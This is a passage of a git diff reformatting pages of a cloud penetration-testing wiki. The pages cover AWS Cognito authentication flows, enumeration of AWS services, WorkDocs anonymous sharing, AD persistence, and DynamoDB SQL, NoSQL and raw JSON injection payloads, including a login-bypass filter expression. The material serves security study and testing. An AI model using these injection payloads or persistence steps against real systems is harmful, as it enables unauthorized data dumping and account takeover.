the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. 
-{% endhint %} +> Moreover, note that you can put anything inside the **`name`** field just modifying the **name attribute**. If an app is **checking** **that** field for some reason **instead of the `email`** (or any other attribute) you might be able to **impersonate other users**. Anyway, if for some reason you changed your email for example to a new one you can access you can **confirm the email with the code you received in that email address**: @@ -168,9 +151,8 @@ aws cognito-idp verify-user-attribute \ Use **`phone_number`** instead of **`email`** to change/verify a **new phone number**. -{% hint style="info" %} -The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred\_username already being used** to impersonate a different user. -{% endhint %} +> [!NOTE] +> The admin could also enable the option to **login with a user preferred username**. Note that you won't be able to change this value to **any username or preferred_username already being used** to impersonate a different user. ### Recover/Change Password @@ -182,9 +164,8 @@ aws cognito-idp forgot-password \ --username --region ``` -{% hint style="info" %} -The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users -{% endhint %} +> [!NOTE] +> The response of the server is always going to be positive, like if the username existed. You cannot use this method to enumerate users With the code you can change the password with: 
@@ -210,32 +191,31 @@ aws cognito-idp change-password \ A user pool supports **different ways to authenticate** to it. If you have a **username and password** there are also **different methods** supported to login.\ Moreover, when a user is authenticated in the Pool **3 types of tokens are given**: The **ID Token**, the **Access token** and the **Refresh token**. -* [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. - * The ID Token is the token that **contains the attributes values of the user**, even the custom ones. -* [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. -* [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. 
+- [**ID Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-id-token.html): It contains claims about the **identity of the authenticated user,** such as `name`, `email`, and `phone_number`. The ID token can also be used to **authenticate users to your resource servers or server applications**. You must **verify** the **signature** of the ID token before you can trust any claims inside the ID token if you use it in external applications. + - The ID Token is the token that **contains the attributes values of the user**, even the custom ones. +- [**Access Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-access-token.html): It contains claims about the authenticated user, a list of the **user's groups, and a list of scopes**. The purpose of the access token is to **authorize API operations** in the context of the user in the user pool. For example, you can use the access token to **grant your user access** to add, change, or delete user attributes. +- [**Refresh Token**](https://docs.aws.amazon.com/cognito/latest/developerguide/amazon-cognito-user-pools-using-the-refresh-token.html): With refresh tokens you can **get new ID Tokens and Access Tokens** for the user until the **refresh token is invalid**. By **default**, the refresh token **expires 30 days after** your application user signs into your user pool. When you create an application for your user pool, you can set the application's refresh token expiration to **any value between 60 minutes and 10 years**. -### ADMIN\_NO\_SRP\_AUTH & ADMIN\_USER\_PASSWORD\_AUTH +### ADMIN_NO_SRP_AUTH & ADMIN_USER_PASSWORD_AUTH This is the server side authentication flow: -* The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. 
The operation returns the required authentication parameters. -* After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. +- The server-side app calls the **`AdminInitiateAuth` API operation** (instead of `InitiateAuth`). This operation requires AWS credentials with permissions that include **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`**. The operation returns the required authentication parameters. +- After the server-side app has the **authentication parameters**, it calls the **`AdminRespondToAuthChallenge` API operation**. The `AdminRespondToAuthChallenge` API operation only succeeds when you provide AWS credentials. This **method is NOT enabled** by default. To **login** you **need** to know: -* user pool id -* client id -* username -* password -* client secret (only if the app is configured to use a secret) +- user pool id +- client id +- username +- password +- client secret (only if the app is configured to use a secret) -{% hint style="info" %} -In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ -Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** -{% endhint %} +> [!NOTE] +> In order to be **able to login with this method** that application must allow to login with `ALLOW_ADMIN_USER_PASSWORD_AUTH`.\ +> Moreover, to perform this action you need credentials with the permissions **`cognito-idp:AdminInitiateAuth`** and **`cognito-idp:AdminRespondToAuthChallenge`** ```python aws cognito-idp admin-initiate-auth \ 
@@ -295,29 +275,28 @@ print(login_user(username, password, client_id, client_secret, user_pool_id)) -### USER\_PASSWORD\_AUTH +### USER_PASSWORD_AUTH -This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW\_USER\_SRP\_AUTH** method instead (as that one never sends the password over the network).\ +This method is another simple and **traditional user & password authentication** flow. It's recommended to **migrate a traditional** authentication method **to Cognito** and **recommended** to then **disable** it and **use** then **ALLOW_USER_SRP_AUTH** method instead (as that one never sends the password over the network).\ This **method is NOT enabled** by default. The main **difference** with the **previous auth method** inside the code is that you **don't need to know the user pool ID** and that you **don't need extra permissions** in the Cognito User Pool. To **login** you **need** to know: -* client id -* username -* password -* client secret (only if the app is configured to use a secret) +- client id +- username +- password +- client secret (only if the app is configured to use a secret) -{% hint style="info" %} -In order to be **able to login with this method** that application must allow to login with ALLOW\_USER\_PASSWORD\_AUTH. -{% endhint %} +> [!NOTE] +> In order to be **able to login with this method** that application must allow to login with ALLOW_USER_PASSWORD_AUTH. ```python aws cognito-idp initiate-auth --client-id \ --auth-flow USER_PASSWORD_AUTH --region \ --auth-parameters 'USERNAME=,PASSWORD=,SECRET_HASH=' - + # Check the python code to learn how to generate the secret_hash ``` 
@@ -367,18 +346,18 @@ print(login_user(username, password, client_id, client_secret, user_pool_id)) -### USER\_SRP\_AUTH +### USER_SRP_AUTH This is scenario is similar to the previous one but **instead of of sending the password** through the network to login a **challenge authentication is performed** (so no password navigating even encrypted through he net).\ This **method is enabled** by default. To **login** you **need** to know: -* user pool id -* client id -* username -* password -* client secret (only if the app is configured to use a secret) +- user pool id +- client id +- username +- password +- client secret (only if the app is configured to use a secret)
@@ -395,7 +374,7 @@ CLIENT_ID = '12xxxxxxxxxxxxxxxxxxxxxxx' CLIENT_SECRET = 'secreeeeet' os.environ["AWS_DEFAULT_REGION"] = "" -aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, +aws = AWSSRP(username=USERNAME, password=PASSWORD, pool_id=POOL_ID, client_id=CLIENT_ID, client_secret=CLIENT_SECRET) tokens = aws.authenticate_user() id_token = tokens['AuthenticationResult']['IdToken'] @@ -406,7 +385,7 @@ token_type = tokens['AuthenticationResult']['TokenType']
-### REFRESH\_TOKEN\_AUTH & REFRESH\_TOKEN +### REFRESH_TOKEN_AUTH & REFRESH_TOKEN This **method is always going to be valid** (it cannot be disabled) but you need to have a valid refresh token. @@ -452,7 +431,7 @@ print(refresh(client_id, token)) -### CUSTOM\_AUTH +### CUSTOM_AUTH In this case the **authentication** is going to be performed through the **execution of a lambda function**. @@ -475,20 +454,17 @@ Note that even if a group is inside a group with an IAM role attached, in order Another requisite to get the **IAM role indicated in the IdToken** when a user is authenticated in the User Pool (`aws cognito-idp initiate-auth...`) is that the **Identity Provider Authentication provider** needs indicate that the **role must be selected from the token.** -
+
The **roles** a user have access to are **inside the `IdToken`**, and a user can **select which role he would like credentials for** with the **`--custom-role-arn`** from `aws cognito-identity get-credentials-for-identity`.\ However, if the **default option** is the one **configured** (`use default role`), and you try to access a role from the IdToken, you will get **error** (that's why the previous configuration is needed): -{% code overflow="wrap" %} ``` An error occurred (InvalidParameterException) when calling the GetCredentialsForIdentity operation: Only SAML providers and providers with RoleMappings support custom role ARN. ``` -{% endcode %} -{% hint style="warning" %} -Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). -{% endhint %} +> [!WARNING] +> Note that the role assigned to a **User Pool Group** needs to be **accesible by the Identity Provider** that **trust the User Pool** (as the IAM role **session credentials are going to be obtained from it**). ```json { @@ -513,17 +489,4 @@ Note that the role assigned to a **User Pool Group** needs to be **accesible by }js ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md similarity index 57% rename from pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md rename to src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md index bc391a196..e660baf74 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md @@ -1,19 +1,6 @@ # AWS - DataPipeline, CodePipeline & CodeCommit Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## DataPipeline @@ -22,10 +9,10 @@ AWS Data Pipeline is designed to facilitate the **access, transformation, and ef 1. **Access Your Data Where It’s Stored**: Data residing in various AWS services can be accessed seamlessly. 2. **Transform and Process at Scale**: Large-scale data processing and transformation tasks are handled efficiently. 3. **Efficiently Transfer Results**: The processed data can be efficiently transferred to multiple AWS services including: - * Amazon S3 - * Amazon RDS - * Amazon DynamoDB - * Amazon EMR + - Amazon S3 + - Amazon RDS + - Amazon DynamoDB + - Amazon EMR In essence, AWS Data Pipeline streamlines the movement and processing of data between different AWS compute and storage services, as well as on-premises data sources, at specified intervals. @@ -42,9 +29,9 @@ aws datapipeline get-pipeline-definition --pipeline-id In the following page you can check how to **abuse datapipeline permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-datapipeline-privesc.md" %} -[aws-datapipeline-privesc.md](../aws-privilege-escalation/aws-datapipeline-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-datapipeline-privesc.md +{{#endref}} ## CodePipeline @@ -65,9 +52,9 @@ aws codepipeline get-pipeline-state --name In the following page you can check how to **abuse codepipeline permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-codepipeline-privesc.md" %} -[aws-codepipeline-privesc.md](../aws-privilege-escalation/aws-codepipeline-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-codepipeline-privesc.md +{{#endref}} ## CodeCommit 
@@ -111,19 +98,6 @@ git clone ssh://@git-codecommit..amazonaws.com/v1/repos/[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md index e659755c5..d3c99529b 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md @@ -1,19 +1,6 @@ # AWS - Directory Services / WorkDocs Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Directory Services 
@@ -23,17 +10,17 @@ AWS Directory Service for Microsoft Active Directory is a managed service that m Directory Services allows to create 5 types of directories: -* **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. -* **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. -* **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. -* **Amazon Cognito User Pools**: This is the same as Cognito User Pools. -* **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. +- **AWS Managed Microsoft AD**: Which will run a new **Microsoft AD in AWS**. You will be able to set the admin password and access the DCs in a VPC. +- **Simple AD**: Which will be a **Linux-Samba** Active Directory–compatible server. You will be able to set the admin password and access the DCs in a VPC. +- **AD Connector**: A proxy for **redirecting directory requests to your existing Microsoft Active Directory** without caching any information in the cloud. It will be listening in a **VPC** and you need to give **credentials to access the existing AD**. +- **Amazon Cognito User Pools**: This is the same as Cognito User Pools. +- **Cloud Directory**: This is the **simplest** one. A **serverless** directory where you indicate the **schema** to use and are **billed according to the usage**. AWS Directory services allows to **synchronise** with your existing **on-premises** Microsoft AD, **run your own one** in AWS or synchronize with **other directory types**. 
### Lab -Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms\_ad\_tutorial\_test\_lab\_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) +Here you can find a nice tutorial to create you own Microsoft AD in AWS: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/ms_ad_tutorial_test_lab_base.html) ### Enumeration @@ -54,17 +41,17 @@ aws ds describe-certificate --directory-id --certificate-id Note that if the **description** of the directory contained a **domain** in the field **`AccessUrl`** it's because a **user** can probably **login** with its **AD credentials** in some **AWS services:** -* `.awsapps.com/connect` (Amazon Connect) -* `.awsapps.com/workdocs` (Amazon WorkDocs) -* `.awsapps.com/workmail` (Amazon WorkMail) -* `.awsapps.com/console` (Amazon Management Console) -* `.awsapps.com/start` (IAM Identity Center) +- `.awsapps.com/connect` (Amazon Connect) +- `.awsapps.com/workdocs` (Amazon WorkDocs) +- `.awsapps.com/workmail` (Amazon WorkMail) +- `.awsapps.com/console` (Amazon Management Console) +- `.awsapps.com/start` (IAM Identity Center) ### Privilege Escalation -{% content-ref url="../aws-privilege-escalation/aws-directory-services-privesc.md" %} -[aws-directory-services-privesc.md](../aws-privilege-escalation/aws-directory-services-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-directory-services-privesc.md +{{#endref}} ## Persistence 
@@ -80,7 +67,7 @@ It's also possible to **add a user to a group inside AD** and **give that AD gro It's possible to share an AD environment from a victim to an attacker. This way the attacker will be able to continue accessing the AD env.\ However, this implies sharing the managed AD and also creating an VPC peering connection. -You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1\_setup\_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) +You can find a guide here: [https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html](https://docs.aws.amazon.com/directoryservice/latest/admin-guide/step1_setup_networking.html) ### ~~Sharing AD (from attacker to victim)~~ @@ -94,7 +81,6 @@ AWS WorkDocs provides a web-based interface for users to upload, access, and man ### Enumeration -{% code overflow="wrap" %} ```bash # Get AD users (Admin not included) aws workdocs describe-users --organization-id @@ -123,25 +109,11 @@ aws workdocs describe-resource-permissions --resource-id aws workdocs add-resource-permissions --resource-id --principals Id=anonymous,Type=ANONYMOUS,Role=VIEWER ## This will give an id, the file will be acesible in: https://.awsapps.com/workdocs/index.html#/share/document/ ``` -{% endcode %} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-workdocs-privesc.md" %} -[aws-workdocs-privesc.md](../aws-privilege-escalation/aws-workdocs-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-workdocs-privesc.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md new file mode 100644 index 000000000..0c97e360e --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md 
@@ -0,0 +1,42 @@ +# AWS - DocumentDB Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## DocumentDB + +Amazon DocumentDB, offering compatibility with MongoDB, is presented as a **fast, reliable, and fully managed database service**. Designed for simplicity in deployment, operation, and scalability, it allows the **seamless migration and operation of MongoDB-compatible databases in the cloud**. Users can leverage this service to execute their existing application code and utilize familiar drivers and tools, ensuring a smooth transition and operation akin to working with MongoDB. + +### Enumeration + +```bash +aws docdb describe-db-clusters # Get username from "MasterUsername", get also the endpoint from "Endpoint" +aws docdb describe-db-instances #Get hostnames from here + +# Parameter groups +aws docdb describe-db-cluster-parameter-groups +aws docdb describe-db-cluster-parameters --db-cluster-parameter-group-name + +# Snapshots +aws docdb describe-db-cluster-snapshots +aws --region us-east-1 --profile ad docdb describe-db-cluster-snapshot-attributes --db-cluster-snapshot-identifier +``` + +### NoSQL Injection + +As DocumentDB is a MongoDB compatible database, you can imagine it's also vulnerable to common NoSQL injection attacks: + +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/nosql-injection +{{#endref}} + +### DocumentDB + +{{#ref}} +../aws-unauthenticated-enum-access/aws-documentdb-enum.md +{{#endref}} + +## References + +- [https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/](https://aws.amazon.com/blogs/database/analyze-amazon-documentdb-workloads-with-performance-insights/) + +{{#include ../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md similarity index 60% rename from pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md index 97e9beeae..173d8f224 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md @@ -1,19 +1,6 @@ # AWS - DynamoDB Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## DynamoDB @@ -43,7 +30,7 @@ There is a GUI for local Dynamo services like [DynamoDB Local](https://aws.amazo ```bash # Tables -aws dynamodb list-tables +aws dynamodb list-tables aws dynamodb describe-table --table-name #Get metadata info ## The primary key and sort key will appear inside the KeySchema field @@ -70,27 +57,27 @@ aws dynamodb describe-endpoints #Dynamodb endpoints ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md" %} -[aws-dynamodb-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +{{#endref}} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-dynamodb-privesc.md" %} -[aws-dynamodb-privesc.md](../aws-privilege-escalation/aws-dynamodb-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-dynamodb-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %} -[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-dynamodb-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-dynamodb-persistence.md" %} -[aws-dynamodb-persistence.md](../aws-persistence/aws-dynamodb-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-dynamodb-persistence.md +{{#endref}} ## DynamoDB Injection 
@@ -98,18 +85,19 @@ aws dynamodb describe-endpoints #Dynamodb endpoints There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. -{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/sql-injection +{{#endref}} ### NoSQL Injection In DynamoDB different **conditions** can be used to retrieve data, like in a common NoSQL Injection if it's possible to **chain more conditions to retrieve** data you could obtain hidden data (or dump the whole table).\ -You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API\_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) +You can find here the conditions supported by DynamoDB: [https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html](https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html) Note that **different conditions** are supported if the data is being accessed via **`query`** or via **`scan`**. -{% hint style="info" %} -Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). -{% endhint %} +> [!NOTE] +> Actually, **Query** actions need to specify the **condition "EQ" (equals)** in the **primary** key to works, making it much **less prone to NoSQL injections** (and also making the operation very limited). If you can **change the comparison** performed or add new ones, you could retrieve more data. 
@@ -120,23 +108,22 @@ If you can **change the comparison** performed or add new ones, you could retrie "GT": " " #All strings are greater than a space ``` -{% embed url="https://book.hacktricks.xyz/pentesting-web/nosql-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/nosql-injection +{{#endref}} ### Raw Json injection -{% hint style="danger" %} -**This vulnerability is based on dynamodb Scan Filter which is now deprecated!** -{% endhint %} +> [!CAUTION] +> **This vulnerability is based on dynamodb Scan Filter which is now deprecated!** **DynamoDB** accepts **Json** objects to **search** for data inside the DB. If you find that you can write in the json object sent to search, you could make the DB dump, all the contents. For example, injecting in a request like: -{% code overflow="wrap" %} ```bash '{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}' ``` -{% endcode %} an attacker could inject something like: @@ -173,11 +160,9 @@ password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none Some SDKs allows to use a string indicating the filtering to be performed like: -{% code overflow="wrap" %} ```java new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap) ``` -{% endcode %} You need to know that searching in DynamoDB for **substituting** an attribute **value** in **filter expressions** while scanning the items, the tokens should **begin** with the **`:`** character. Such tokens will be **replaced** with actual **attribute value at runtime**. 
@@ -190,17 +175,4 @@ Therefore, a login like the previous one can be bypassed with something like: # which is always true ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md similarity index 68% rename from pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md index 3ba4235a8..a3c8bc9b9 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md @@ -1,27 +1,14 @@ # AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
